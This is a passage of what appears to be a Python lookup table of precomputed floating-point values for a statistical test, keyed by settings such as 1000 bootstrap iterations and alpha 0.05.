0.38872250366211547, 0.38971362304688106, 0.39070474243164666, 0.39169604492188104, 0.3926873474121154, 0.3936787719726623, 0.39467031860352164, 0.39566186523438096, 0.3966535339355528, 0.3976453247070372, 0.3986371765136778, 0.3996290893554747, 0.4006211242675841, 0.4016132202148498, 0.40260537719727174, 0.4035976562500061, 0.4045899963378967, 0.40558245849609986, 0.40657498168945927, 0.40756756591797494, 0.40856027221680313, 0.4095530395507876, 0.4105458679199283, 0.41153881835938144, 0.41253182983399084, 0.4135249023437565, 0.4145180969238347, 0.4155113525390691, 0.4165047302246161, 0.4174981689453192, 0.4184916687011786, 0.4194852905273505, 0.4204789733886787, 0.4214727172851631, 0.42246658325196007, 0.4234605102539132, 0.42445449829102255, 0.42544860839844445, 0.4264427795410226, 0.42743701171875703, 0.428431365966804, 0.4294257812500071, 0.4304203186035227, 0.4314149169921946, 0.43240957641602273, 0.43340429687500714, 0.4343991394043041, 0.43539404296875717, 0.4363890686035228, 0.43738415527344465, 0.4383793029785228, 0.43937457275391345, 0.4403698425293041, 0.44136529541016345, 0.4423607482910228, 0.44335632324219465, 0.4443519592285228, 0.4453477172851634, 0.44634353637696034, 0.4473394165039134, 0.448335418701179, 0.44933148193360084, 0.45032760620117895, 0.4513238525390696, 0.4523201599121165, 0.45331652832031955, 0.45431295776367886, 0.4553095092773507, 0.45630618286133506, 0.45730285644531943, 0.4582996520996163, 0.45929650878906936, 0.4602934875488349, 0.46129052734375675, 0.46228762817383484, 0.46328485107422546, 0.46428213500977233, 0.46527947998047536, 0.46627688598633465, 0.46727441406250647, 0.46827200317383455, 0.46926971435547515, 0.470267486572272, 0.47126531982422515, 0.4722632751464908, 0.47326123046875646, 0.4742593688964908, 0.4752575073242251, 0.47625576782227197, 0.4772540893554751, 0.47825247192383447, 0.47925097656250637, 0.48024954223633454, 0.48124822998047523, 0.4822469787597722, 0.4832457885742253, 0.48424465942383466, 
0.48524365234375655, 0.4862427062988347, 0.4872418212890691, 0.48824105834961606, 0.48924035644531916, 0.4902397155761785, 0.4912391967773504, 0.49223873901367854, 0.4932384033203192, 0.4942380676269599, 0.49523785400391296, 0.49623776245117857, 0.4972376708984442, 0.4982377014160223, 0.49923785400391296, 0.5002380065918036, 0.5012382812500068, 0.5022386779785225, 0.5032390747070382, 0.5042395935058663, 0.505240234375007, 0.5062408752441475, 0.5072416381836006, 0.5082425231933662, 0.5092434082031317, 0.5102444152832099, 0.5112454833984442, 0.5122466735839911, 0.5132479248046943, 0.5142492370605537, 0.5152506713867255, 0.5162521667480537, 0.5172537231445381, 0.5182554016113349, 0.5192571411132879, 0.5202589416503972, 0.521260864257819, 0.5222628479003971, 0.5232648925781315, 0.5242670593261783, 0.5252692871093815, 0.5262715759277409, 0.5272739868164127, 0.5282764587402409, 0.5292790527343815, 0.530281646728522, 0.531284362792975, 0.5322872009277405, 0.5332901000976623, 0.5342930603027404, 0.5352960815429747, 0.5362992248535216, 0.5373024291992247, 0.5383057556152403, 0.5393091430664122, 0.5403125915527404, 0.541316162109381, 0.542319793701178, 0.5433234863281312, 0.544327301025397, 0.5453311767578188, 0.546335113525397, 0.5473391723632876, 0.5483432922363344, 0.5493475341796937, 0.5503517761230531, 0.5513562011718812, 0.5523606262207094, 0.55336517333985, 0.5543698425293032, 0.5553745117187564, 0.5563793029785221, 0.5573842163086004, 0.5583891906738349, 0.5593942260742256, 0.5603993225097726, 0.5614045410156322, 0.5624098815918042, 0.563415222167976, 0.5644207458496165, 0.5654262695312572, 0.5664319152832104, 0.5674376220703198, 0.5684434509277417, 0.56944934082032, 0.5704552917480544, 0.5714613647461014, 0.5724674987793047, 0.5734737548828205, 0.5744800720214924, 0.5754864501953205, 0.576492950439461, 0.5774995727539142, 0.5785061950683673, 0.579512939453133, 0.5805198059082112, 0.5815267333984456, 0.5825337219238363, 0.5835408325195396, 0.5845480041503991, 
0.5855552368164149, 0.586562591552743, 0.5875700073242273, 0.5885775451660241, 0.5895851440429772, 0.5905928649902429, 0.5916006469726648, 0.5926085510253992, 0.5936165161132899, 0.5946245422363369, 0.5956326904296964, 0.5966408996582121, 0.5976492309570403, 0.5986576232910245, 0.599666076660165, 0.6006746520996181, 0.6016833496093837, 0.6026921081543056, 0.6037009277343838, 0.6047098693847744, 0.6057188720703214, 0.6067279968261808, 0.6077371826171966, 0.6087464904785247, 0.6097558593750089, 0.6107653503418057, 0.6117749023437588, 0.6127845764160244, 0.6137943115234462, 0.6148041076660243, 0.615814025878915, 0.6168240661621182, 0.6178341674804776, 0.6188443298339933, 0.6198546142578214, 0.6208650207519618, 0.6218754882812586, 0.6228860168457117, 0.6238966674804772, 0.6249074401855553, 0.6259182739257897, 0.6269291687011803, 0.6279401855468835, 0.6289513244628991, 0.629962524414071, 0.6309738464355553, 0.6319852294921958, 0.6329966735839926, 0.6340083007812581, 0.6350199279785237, 0.636031738281258, 0.6370436096191486, 0.6380555419921955, 0.6390675964355549, 0.6400797119140705, 0.6410919494628986, 0.6421043090820392, 0.6431167297363359, 0.6441292724609452, 0.6451418762207107, 0.6461546020507888, 0.6471674499511794, 0.6481803588867262, 0.6491933288574293, 0.6502064208984449, 0.651219635009773, 0.6522329711914135, 0.6532463684082103, 0.6542598266601632, 0.6552734069824288, 0.6562871093750068, 0.6573009338378973, 0.6583148193359442, 0.6593288269043035, 0.6603428955078191, 0.6613570861816471, 0.6623713378906314, 0.6633857727050844, 0.6644002075195373, 0.6654148254394591, 0.6664295043945371, 0.6674443054199276, 0.6684591674804744, 0.6694741516113337, 0.6704892578125056, 0.6715044860839899, 0.6725197753906306, 0.6735351867675837, 0.6745506591796931, 0.675566253662115, 0.6765819702148493, 0.6775978088378961, 0.6786137084960991, 0.6796297302246147, 0.6806458740234428, 0.6816621398925834, 0.6826784667968803, 0.6836949157714897, 0.6847114257812553, 0.6857281188964898, 
0.6867448730468805, 0.6877617492675837, 0.6887786865234432, 0.6897958068847714, 0.6908129882812556, 0.6918302917480524, 0.6928476562500056, 0.6938652038574274, 0.6948828125000056, 0.6959005432128963, 0.6969183959960995, 0.6979363708496152, 0.6989544067382871, 0.6999726257324276, 0.7009909057617244, 0.7020093078613338, 0.7030278320312556, 0.7040464172363338, 0.7050651855468807, 0.7060840148925839, 0.7071029663085996, 0.7081220397949277, 0.7091412353515684, 0.7101605529785214, 0.711179992675787, 0.7121994934082089, 0.7132191772460995, 0.7142389221191464, 0.7152587890625058, 0.7162787780761777, 0.717298889160162, 0.7183191833496151, 0.7193395385742244, 0.72035995483399, 0.7213805541992243, 0.7224012756347712, 0.7234221191406306, 0.7244430847168024, 0.7254641723632868, 0.7264853210449272, 0.7275066528320365, 0.7285281066894583, 0.7295496826171927, 0.7305713195800833, 0.7315931396484426, 0.7326150817871144, 0.7336371459960987, 0.7346593322753955, 0.7356816406250047, 0.7367040710449265, 0.7377266235351608, 0.7387492980957077, 0.7397721557617233, 0.740795074462895, 0.7418181762695356, 0.7428413391113323, 0.7438646850585978, 0.7448881530761758, 0.7459117431640664, 0.7469355163574257, 0.7479593505859413, 0.7489833679199255, 0.7500074462890659, 0.7510317077636751, 0.7520561523437531, 0.7530806579589874, 0.7541053466796904, 0.755130157470706, 0.756155090332034, 0.7571801452636745, 0.7582053833007837, 0.7592307434082054, 0.7602562255859396, 0.7612818908691427, 0.762307617187502, 0.7633335876464861, 0.7643596191406264, 0.7653858337402356, 0.7664121704101573, 0.7674386901855478, 0.7684653320312508, 0.7694920959472663, 0.7705190429687506, 0.7715461120605475, 0.7725733642578131, 0.7736007385253911, 0.7746282348632817, 0.7756559143066409, 0.776683776855469, 0.7777117614746095, 0.7787398681640626, 0.7797681579589845, 0.7807966308593751, 0.7818252258300783, 0.7828540039062502, 0.7838829040527345, 0.7849119873046876, 0.7859411926269532, 0.7869705810546875, 0.7880001525878907, 
0.7890299072265625, 0.7900597839355469, 0.7910897827148436, 0.7921200256347655, 0.7931503906249998, 0.794180938720703, 0.7952116699218748, 0.7962425231933591, 0.7972735595703121, 0.7983047790527339, 0.7993361816406245, 0.8003677673339838, 0.8013994750976556, 0.8024314270019525, 0.8034635009765617, 0.8044957580566398, 0.8055281982421866, 0.8065608215332022, 0.8075936279296864, 0.8086266174316393, 0.8096597900390611, 0.8106932067871079, 0.8117267456054672, 0.8127604675292952, 0.813794372558592, 0.8148285217285137, 0.815862792968748, 0.8168973083496073, 0.8179320068359354, 0.8189668884277322, 0.8200019531249979, 0.8210372619628884, 0.8220726928710914, 0.8231084289550757, 0.8241442871093726, 0.8251803894042945, 0.8262166748046852, 0.8272532043457009, 0.8282899169921852, 0.8293268127441383, 0.8303639526367165, 0.8314012756347634, 0.8324388427734353, 0.8334766540527322, 0.8345146484374978, 0.8355528869628884, 0.8365913085937479, 0.8376299743652321, 0.8386688842773414, 0.8397080383300758, 0.8407473754882789, 0.841786956787107, 0.8428267822265602, 0.8438668518066382, 0.8449071655273414, 0.8459476623535132, 0.8469884643554663, 0.8480295104980443, 0.8490707397460912, 0.8501122741699192, 0.8511540527343723, 0.8521960754394503, 0.8532384033203096, 0.8542809143066378, 0.8553237304687472, 0.8563667907714815, 0.8574101562499971, 0.8584537658691377, 0.8594976196289034, 0.8605417785644504, 0.8615862426757785, 0.8626309509277316, 0.863675964355466, 0.8647212219238255, 0.8657667846679661, 0.866812652587888, 0.8678588256835912, 0.8689053039550755, 0.8699520874023411, 0.8709991149902317, 0.8720465087890599, 0.8730942077636693, 0.8741422119140599, 0.8751905212402318, 0.8762391967773412, 0.8772881774902318, 0.8783374633789036, 0.879387115478513, 0.8804371337890599, 0.881487457275388, 0.8825381469726538, 0.8835892028808568, 0.8846405639648413, 0.8856922912597632, 0.886744445800779, 0.887796905517576, 0.8888497924804667, 0.8899030456542949, 0.8909566650390605, 0.89201071166992, 
0.8930651245117168, 0.8941199645996075, 0.8951751708984357, 0.8962308654785137, 0.8972869262695294, 0.8983434143066388, 0.899400329589842, 0.900457733154295, 0.9015155639648419, 0.9025738220214824, 0.903632568359373, 0.9046917419433572, 0.9057514648437478, 0.906811614990232, 0.9078722534179663, 0.9089334411621067, 0.9099951171874973, 0.9110572814941379, 0.9121199951171847, 0.9131832580566378, 0.9142470703124973, 0.9153114318847629, 0.9163763427734348, 0.9174418640136691, 0.9185079345703097, 0.9195746765136691, 0.9206419677734347, 0.9217098693847627, 0.9227784423828097, 0.9238476867675752, 0.9249175415039033, 0.9259881286621064, 0.9270593872070282, 0.9281313781738249, 0.9292041015624966, 0.9302774963378871, 0.9313517456054652, 0.9324267272949184, 0.9335025024414026, 0.9345790710449183, 0.9356565551757777, 0.9367348327636683, 0.9378140258789026, 0.9388941345214806, 0.9399751586914024, 0.941057098388668, 0.9421400756835899, 0.9432240905761681, 0.9443091430664025, 0.9453952331542931, 0.9464824218749962, 0.9475708312988242, 0.9486603393554648, 0.9497511291503867, 0.95084320068359, 0.9519365539550743, 0.9530312499999961, 0.9541274108886679, 0.9552249755859336, 0.9563241271972618, 0.9574248046874961, 0.9585271301269492, 0.9596312255859335, 0.9607370910644492, 0.9618448486328085, 0.9629546203613241, 0.964066406249996, 0.9651803894042928, 0.9662966308593709, 0.9674153137206989, 0.9685365600585895, 0.969660491943355, 0.9707873535156205, 0.9719172058105424, 0.9730503540039018, 0.9741870422363237, 0.9753275146484331, 0.976472015380855, 0.9776209716796831, 0.9787746887206988, 0.9799337158203082, 0.9810985412597611, 0.9822698364257768, 0.9834483337402299, 0.9846350097656206, 0.9858310241699174, 0.987037719726558, 0.9882571716308547, 0.9894917602539016, 0.9907451477050735, 0.9920223388671828, 0.9933315124511671, 0.9946865234374952, 0.9961158752441358, 0.9977000732421827], # skipcq: FLK-E501 'num_bt = 1000, alpha = 0.05,': [5.1300048828125e-05, 0.00035546875, 
0.0008181457519531249, 0.001367431640625, 0.0019721374511718747, 0.002616149902343749, 0.0032897644042968735, 0.003986877441406248, 0.0047030334472656235, 0.005435119628906249, 0.006180877685546875, 0.006938415527343749, 0.007706207275390624, 0.008483215332031249, 0.009268402099609375, 0.010061035156249998, 0.010860321044921874, 0.011665710449218752, 0.012476776123046877, 0.013293029785156254, 0.01411404418945313, 0.014939575195312506, 0.015769256591796878, 0.016602905273437503, 0.017440155029296876, 0.0182808837890625, 0.019124908447265623, 0.01997198486328125, 0.020821990966796877, 0.0216748046875, 0.022530242919921874, 0.02338818359375, 0.024248565673828125, 0.0251112060546875, 0.02597610473632813, 0.02684307861328126, 0.02771206665039063, 0.028583007812500005, 0.029455841064453134, 0.03033050537109376, 0.03120687866210939, 0.03208489990234376, 0.03296456909179689, 0.03384582519531252, 0.0347286071777344, 0.03561279296875002, 0.03649844360351565, 0.03738549804687503, 0.038273895263671906, 0.03916351318359378, 0.04005447387695316, 0.04094659423828129, 0.04183999633789067, 0.04273449707031255, 0.04363015747070318, 0.04452685546875006, 0.04542471313476568, 0.046323608398437556, 0.04722348022460943, 0.048124389648437564, 0.04902621459960944, 0.04992907714843756, 0.0508327941894532, 0.05173748779296882, 0.052643035888671946, 0.053549438476562565, 0.05445669555664069, 0.05536480712890631, 0.05627371215820319, 0.05718347167968756, 0.05809396362304694, 0.05900524902343756, 0.05991732788085944, 0.06083007812500007, 0.06174356079101569, 0.06265783691406254, 0.06357272338867193, 0.06448834228515629, 0.06540463256835943, 0.0663215942382813, 0.06723916625976567, 0.0681574096679688, 0.06907632446289066, 0.06999578857421879, 0.07091592407226566, 0.0718366088867188, 0.07275790405273444, 0.07367980957031256, 0.07460226440429693, 0.07552526855468755, 0.07644888305664069, 0.07737298583984381, 0.07829763793945319, 0.07922283935546881, 0.08014852905273445, 0.08107476806640634, 
0.08200155639648449, 0.08292877197265636, 0.08385653686523448, 0.08478479003906261, 0.08571347045898448, 0.08664270019531259, 0.08757235717773446, 0.08850244140625008, 0.08943307495117195, 0.09036407470703131, 0.09129556274414069, 0.09222747802734382, 0.09315982055664071, 0.09409265136718759, 0.09502584838867195, 0.09595947265625007, 0.09689352416992195, 0.09782800292968757, 0.0987628479003907, 0.09969812011718757, 0.1006338195800782, 0.10156982421875008, 0.10250631713867195, 0.10344311523437508, 0.10438034057617196, 0.10531793212890633, 0.10625588989257823, 0.10719415283203138, 0.10813284301757825, 0.10907189941406262, 0.1100113220214845, 0.11095104980468765, 0.11189114379882828, 0.1128316040039064, 0.11377243041992202, 0.11471350097656266, 0.11565499877929702, 0.11659680175781265, 0.11753890991210952, 0.11848138427734389, 0.11942416381835952, 0.1203672485351564, 0.12131063842773454, 0.12225439453125017, 0.12319839477539082, 0.12414276123046897, 0.1250874328613284, 0.12603234863281282, 0.1269776306152347, 0.12792315673828158, 0.12886904907226598, 0.12981518554687538, 0.13076162719726603, 0.13170831298828167, 0.13265536499023484, 0.133602661132813, 0.13455020141601615, 0.13549804687500056, 0.13644619750976617, 0.13739459228515677, 0.13834323120117237, 0.13929223632812548, 0.1402414245605474, 0.14119091796875055, 0.1421406555175787, 0.14309063720703186, 0.14404092407226626, 0.14499145507812566, 0.14594223022461006, 0.14689324951171945, 0.14784451293945383, 0.14879608154296942, 0.1497478332519538, 0.15069989013671942, 0.15165219116211004, 0.15260467529296945, 0.15355746459961006, 0.15451043701171946, 0.15546371459961006, 0.15641717529296945, 0.15737088012695383, 0.1583248291015632, 0.15927902221679757, 0.160233459472657, 0.16118807983398514, 0.1621429443359383, 0.16309805297851643, 0.16405340576171956, 0.16500894165039143, 0.1659647216796883, 0.16692068481445393, 0.16787689208984458, 0.1688333435058602, 0.16978997802734463, 0.1707467956542978, 0.1717039184570322, 
0.17266116333007908, 0.17361865234375096, 0.17457638549804783, 0.17553430175781348, 0.17649240112304787, 0.1774507446289073, 0.17840927124023548, 0.17936804199218864, 0.18032699584961054, 0.18128613281250117, 0.18224545288086058, 0.183205017089845, 0.18416476440429813, 0.18512469482422, 0.1860848083496106, 0.1870451660156262, 0.1880057067871106, 0.1889664306640637, 0.18992733764648562, 0.19088842773437625, 0.19184976196289188, 0.19281121826172004, 0.1937729187011732, 0.1947347412109388, 0.19569680786132942, 0.19665905761718883, 0.19762149047851696, 0.19858404541015756, 0.19954684448242316, 0.20050982666015754, 0.20147299194336066, 0.20243627929687624, 0.20339981079101682, 0.20436346435546993, 0.20532736206054802, 0.20629138183593865, 0.20725558471679806, 0.20822003173828246, 0.20918460083007934, 0.21014929199218874, 0.21111422729492313, 0.21207928466797, 0.21304458618164185, 0.21401000976562623, 0.21497561645507934, 0.21594134521484498, 0.21690731811523561, 0.21787341308593877, 0.21883969116211066, 0.21980609130859508, 0.22077267456054822, 0.2217394409179701, 0.2227063903808607, 0.22367346191406384, 0.2246407165527357, 0.2256081542968763, 0.22657571411132943, 0.22754345703125134, 0.22851138305664198, 0.22947943115234515, 0.23044766235351705, 0.23141601562500147, 0.23238455200195463, 0.2333532714843765, 0.23432211303711092, 0.2352910766601578, 0.23626028442382968, 0.23722955322265782, 0.23819906616211095, 0.23916864013672035, 0.24013845825195473, 0.24110833740234539, 0.24207846069336103, 0.24304864501953294, 0.24401901245117358, 0.244989562988283, 0.2459602355957049, 0.24693109130859553, 0.24790206909179868, 0.2488731689453143, 0.24984445190429871, 0.25081585693359565, 0.25178744506836126, 0.2527591552734394, 0.25373098754883006, 0.2547030029296894, 0.25567514038086125, 0.2566474609375019, 0.2576198425292988, 0.25859246826172066, 0.2595651550292988, 0.2605380249023457, 0.261511016845705, 0.2624841918945331, 0.26345742797851746, 0.2644308471679705, 
0.2654044494628923, 0.2663781738281267, 0.2673519592285173, 0.26832598876953284, 0.26930007934570466, 0.27027435302734526, 0.2712487487792984, 0.27222326660156404, 0.27319796752929837, 0.27417272949218896, 0.27514767456054834, 0.27612274169922024, 0.27709799194336093, 0.2780733032226579, 0.2790487976074235, 0.28002441406250167, 0.28100015258789235, 0.2819760742187517, 0.2829520568847673, 0.2839282226562517, 0.28490451049804866, 0.285880920410158, 0.28685745239257987, 0.28783410644531426, 0.28881094360351733, 0.28978784179687667, 0.2907649230957048, 0.29174212646484543, 0.2927194519042985, 0.29369689941406407, 0.2946744689941422, 0.2956521606445328, 0.29662997436523586, 0.2976079711914077, 0.2985860290527358, 0.2995642700195327, 0.3005426330566421, 0.301521118164064, 0.3024996643066421, 0.303478393554689, 0.30445724487304837, 0.3054362182617203, 0.30641531372070474, 0.3073945312500017, 0.3083738708496111, 0.30935339355468927, 0.3103329772949237, 0.31131268310547067, 0.31229251098633004, 0.3132725219726582, 0.3142525939941426, 0.3152327880859396, 0.31621310424804894, 0.3171936035156271, 0.3181741638183615, 0.31915484619140844, 0.3201356506347678, 0.3211166381835959, 0.3220976867675803, 0.32307885742187725, 0.3240601501464866, 0.32504156494140846, 0.32602310180664285, 0.32700476074218976, 0.3279865417480491, 0.32896844482422094, 0.3299504699707053, 0.3309326171875022, 0.33191488647461165, 0.33289721679687734, 0.3338797302246117, 0.3348623657226586, 0.33584506225586175, 0.3368278808593774, 0.3378108825683619, 0.3387939453125026, 0.33977713012695576, 0.34076043701172143, 0.3417438659667996, 0.34272741699219034, 0.34371109008789347, 0.34469482421875286, 0.34567874145508104, 0.3466627197265655, 0.34764682006836245, 0.3486311035156281, 0.34961544799805, 0.35059991455078443, 0.3515844421386751, 0.3525691528320345, 0.3535539855957064, 0.35453887939453455, 0.3555238952636752, 0.3565090332031283, 0.35749429321289394, 0.3584796752929721, 0.35946517944336276, 0.3604507446289097, 
0.3614364929199253, 0.36242230224609717, 0.36340823364258157, 0.3643942871093785, 0.36538046264648794, 0.36636669921875364, 0.36735311889648803, 0.3683395996093787, 0.36932620239258185, 0.37031292724609755, 0.3712997131347695, 0.37228668212891025, 0.37327371215820726, 0.3742608642578167, 0.37524813842773863, 0.3762355346679731, 0.37722299194336384, 0.37821063232422325, 0.3791983337402389, 0.3801861572265671, 0.38117410278320785, 0.38216210937500483, 0.38315023803711423, 0.3841385498046924, 0.3851268615722706, 0.3861153564453176, 0.38710397338867697, 0.3880926513671926, 0.3890814514160208, 0.3900703735351615, 0.39105935668945846, 0.3920485229492241, 0.393037750244146, 0.3940270996093804, 0.3950165100097711, 0.3960061035156305, 0.3969957580566461, 0.39798553466797426, 0.39897543334961494, 0.3999653930664119, 0.40095547485352123, 0.4019456787109431, 0.4029360046386775, 0.40392645263672444, 0.4049169616699275, 0.4059075927734431, 0.40689834594727126, 0.40788916015625565, 0.4088801574707087, 0.40987121582031805, 0.41086233520508364, 0.411853637695318, 0.41284500122070866, 0.4138364868164117, 0.4148280944824273, 0.41581976318359914, 0.4168115539550835, 0.4178034667968804, 0.4187955017089898, 0.4197875976562555, 0.42077987670898986, 0.4217721557617242, 0.42276461791992737, 0.4237571411132868, 0.4247497863769587, 0.42574255371094316, 0.42673544311524014, 0.4277283935546933, 0.42872146606445893, 0.4297146606445371, 0.43070791625977156, 0.43170129394531853, 0.4326947937011779, 0.43368835449219356, 0.434682098388678, 0.4356759033203187, 0.43666976928711565, 0.4376638183593813, 0.4386579284668032, 0.4396521606445376, 0.4406464538574283, 0.44164093017578765, 0.4426354675293033, 0.44363006591797516, 0.44462484741211583, 0.44561968994141277, 0.4466146545410221, 0.4476096801757877, 0.44860482788086586, 0.4496000976562565, 0.4505954895019596, 0.45159094238281894, 0.4525865173339908, 0.4535822143554752, 0.4545780334472721, 0.45557391357422516, 0.45656991577149075, 
0.4575659790039126, 0.45856222534180324, 0.45955853271485014, 0.4605549011230532, 0.46155145263672503, 0.46254806518555314, 0.46354479980469376, 0.46454159545899065, 0.4655385742187562, 0.4665355529785218, 0.46753271484375614, 0.46852993774414675, 0.4695272827148498, 0.47052474975586533, 0.4715223388671934, 0.47251998901367775, 0.4735177612304746, 0.47451559448242775, 0.4755135498046934, 0.47651162719727147, 0.47750982666016206, 0.4785080871582089, 0.4795064697265683, 0.4805049743652402, 0.48150354003906837, 0.4825022888183653, 0.4835010375976623, 0.4844999694824279, 0.4854989624023498, 0.4864980773925842, 0.48749731445313116, 0.48849661254883425, 0.48949603271484987, 0.490495574951178, 0.4914951782226624, 0.4924949645996155, 0.4934947509765686, 0.49449472045899046, 0.4954947509765686, 0.49649490356445924, 0.4974951782226623, 0.49849551391602165, 0.49949603271484977, 0.5004965515136779, 0.5014972534179748, 0.5024980163574279, 0.5034989013671934, 0.5044999084472716, 0.5055009765625059, 0.5065021667480528, 0.5075034790039122, 0.5085048522949279, 0.5095064086914122, 0.5105080261230527, 0.5115097045898495, 0.512511566162115, 0.5135134887695368, 0.5145154724121149, 0.5155176391601618, 0.5165198669433649, 0.5175222167968806, 0.5185246887207087, 0.519527221679693, 0.5205298767089898, 0.521532653808599, 0.5225355529785208, 0.5235385131835989, 0.5245415954589895, 0.5255447998046926, 0.526548065185552, 0.5275514526367239, 0.5285549621582083, 0.5295585937500052, 0.5305622863769585, 0.5315661010742242, 0.5325700378418023, 0.533574096679693, 0.5345782165527398, 0.5355824584960992, 0.5365868225097711, 0.5375913085937555, 0.5385958557128961, 0.5396005249023493, 0.540605316162115, 0.541610168457037, 0.5426152038574278, 0.5436203002929748, 0.5446255187988344, 0.5456307983398502, 0.5466361999511784, 0.5476417236328189, 0.5486473693847721, 0.5496531372070378, 0.5506589660644597, 0.5516649169921942, 0.5526709899902412, 0.5536771850586008, 0.5546834411621165, 0.5556898193359447, 
0.5566963195800853, 0.5577029418945384, 0.5587096252441478, 0.559716491699226, 0.5607234191894604, 0.5617304077148512, 0.5627375793457107, 0.5637448120117264, 0.5647522277832108, 0.5657597045898514, 0.5667672424316482, 0.5677749633789139, 0.5687827453613358, 0.5697906494140702, 0.5707986755371172, 0.5718068237304766, 0.5728150329589924, 0.5738234252929767, 0.5748318786621173, 0.5758404541015704, 0.576849151611336, 0.5778579101562579, 0.5788668518066485, 0.5798758544921955, 0.5808849792480549, 0.5818942260742268, 0.5829035339355548, 0.5839130249023515, 0.5849225769043046, 0.5859322509765702, 0.5869420471191483, 0.587951965332039, 0.5889620056152421, 0.5899721679687578, 0.5909823913574297, 0.5919927368164138, 0.5930032043457106, 0.59401379394532, 0.5950245056152418, 0.5960353393554761, 0.5970462341308668, 0.5980573120117262, 0.5990684509277419, 0.60007971191407, 0.6010910949707106, 0.6021026000976636, 0.6031142272949291, 0.604125915527351, 0.6051377868652416, 0.6061497192382884, 0.6071618347168041, 0.6081740112304759, 0.6091863098144602, 0.610198730468757, 0.6112112731933662, 0.612223937988288, 0.6132366638183661, 0.6142495727539129, 0.6152626037597723, 0.6162756958007879, 0.6172889709472721, 0.6183023071289125, 0.6193157653808655, 0.6203294067382873, 0.6213431091308653, 0.6223569335937559, 0.623370880126959, 0.6243849487304746, 0.6253991394043026, 0.6264134521484431, 0.6274278869628961, 0.6284424438476616, 0.6294571228027396, 0.6304719238281301, 0.6314867858886769, 0.6325018310546925, 0.6335169982910206, 0.6345322875976612, 0.6355476989746144, 0.6365631713867238, 0.6375788269043019, 0.6385946044921925, 0.6396105041503956, 0.6406265258789111, 0.6416426086425829, 0.6426588745117235, 0.6436752624511767, 0.6446917724609423, 0.6457084045410205, 0.6467251586914112, 0.6477420349121145, 0.6487590942382864, 0.6497762145996144, 0.6507934570312549, 0.6518108825683643, 0.6528283691406299, 0.6538459777832081, 0.654863769531255, 0.6558816833496145, 0.6568997192382864, 
0.6579178161621144, 0.6589361572265674, 0.6599545593261767, 0.6609730834960986, 0.661991729736333, 0.6630105590820362, 0.6640294494628957, 0.6650485229492238, 0.6660677185058644, 0.6670870361328175, 0.6681064758300831, 0.6691260986328175, 0.6701457824707081, 0.6711656494140675, 0.6721856384277394, 0.6732057495117237, 0.6742259826660205, 0.6752463989257861, 0.6762669372558642, 0.6772875366210985, 0.6783083801269579, 0.6793292846679736, 0.6803503112793017, 0.6813715209960985, 0.6823928527832078, 0.6834143676757859, 0.6844359436035202, 0.6854577026367233, 0.686479583740239, 0.6875016479492232, 0.6885237731933637, 0.6895460815429729, 0.690568572998051, 0.6915911254882853, 0.6926138610839884, 0.693636718750004, 0.6946597595214882, 0.6956829223632849, 0.6967062072753941, 0.6977296142578159, 0.6987532043457064, 0.6997769775390658, 0.7008008117675814, 0.7018248291015655, 0.7028490295410185, 0.7038733520507839, 0.7048977966308619, 0.7059224243164087, 0.706947174072268, 0.7079720458984398, 0.7089971008300803, 0.7100223388671895, 0.7110476989746112, 0.7120731811523454, 0.7130988464355484, 0.714124633789064, 0.7151506042480481, 0.7161766967773447, 0.7172029724121102, 0.7182293701171881, 0.7192559509277349, 0.7202827148437504, 0.7213096008300784, 0.722336608886719, 0.7233638000488284, 0.7243911743164064, 0.725418670654297, 0.7264463500976562, 0.7274742126464843, 0.7285021972656248, 0.7295303649902342, 0.730558654785156, 0.7315871276855467, 0.7326157836914061, 0.733644561767578, 0.7346735229492186, 0.7357026672363279, 0.736731994628906, 0.7377614440917967, 0.7387910766601561, 0.7398208923339842, 0.7408508300781248, 0.7418809509277341, 0.7429112548828122, 0.743941741943359, 0.7449724121093747, 0.7460032043457028, 0.7470341796874996, 0.7480653381347652, 0.7490966796874995, 0.7501282043457026, 0.7511599121093744, 0.752191802978515, 0.7532238159179679, 0.754256072998046, 0.7552884521484365, 0.7563210144042959, 0.7573538208007801, 0.7583867492675768, 0.7594198608398423, 
0.7604532165527328, 0.7614866943359359, 0.7625203552246076, 0.7635542602539044, 0.7645882873535136, 0.7656225585937478, 0.7666569519042946, 0.7676915893554664, 0.7687264099121071, 0.7697614135742165, 0.7707966613769507, 0.7718320312499974, 0.7728676452636692, 0.7739034423828098, 0.7749394226074192, 0.7759755859374974, 0.7770119934082006, 0.7780485839843725, 0.7790853576660132, 0.7801223754882788, 0.7811595153808569, 0.7821969604492164, 0.7832345275878883, 0.7842723999023414, 0.785310394287107, 0.7863486328124977, 0.7873870544433571, 0.7884257202148414, 0.7894646301269507, 0.7905037231445288, 0.7915429992675757, 0.7925825195312475, 0.7936222839355443, 0.7946622314453099, 0.7957024230957005, 0.7967428588867161, 0.7977834777832004, 0.7988243408203096, 0.7998654479980439, 0.800906738281247, 0.8019482727050751, 0.8029901123046844, 0.8040320739746062, 0.8050743408203093, 0.8061168518066374, 0.8071595458984343, 0.8082025451660124, 0.8092457275390593, 0.8102892150878874, 0.8113328857421843, 0.8123768615722625, 0.8134210205078095, 0.8144654846191377, 0.8155101928710907, 0.8165551452636689, 0.8176003417968721, 0.8186458435058565, 0.8196915283203096, 0.820737518310544, 0.8217838134765597, 0.822830291748044, 0.8238770751953096, 0.8249241638183565, 0.8259714965820284, 0.8270190734863253, 0.8280669555664034, 0.8291151428222628, 0.8301635742187471, 0.8312123107910127, 0.8322612915039033, 0.8333106384277313, 0.8343602294921845, 0.8354100646972625, 0.8364602661132782, 0.8375107727050751, 0.838561523437497, 0.8396125793457002, 0.8406640014648409, 0.8417156677246066, 0.8427677001953099, 0.8438200378417943, 0.84487268066406, 0.845925628662107, 0.8469788818359352, 0.8480325012207007, 0.8490864257812477, 0.850140716552732, 0.8511953124999977, 0.8522502746582009, 0.8533055419921852, 0.8543611755371071, 0.8554171752929666, 0.8564734802246071, 0.8575302124023415, 0.8585872497558572, 0.8596446533203103, 0.8607024230957009, 0.8617606201171851, 0.8628191223144507, 0.8638780517578101, 
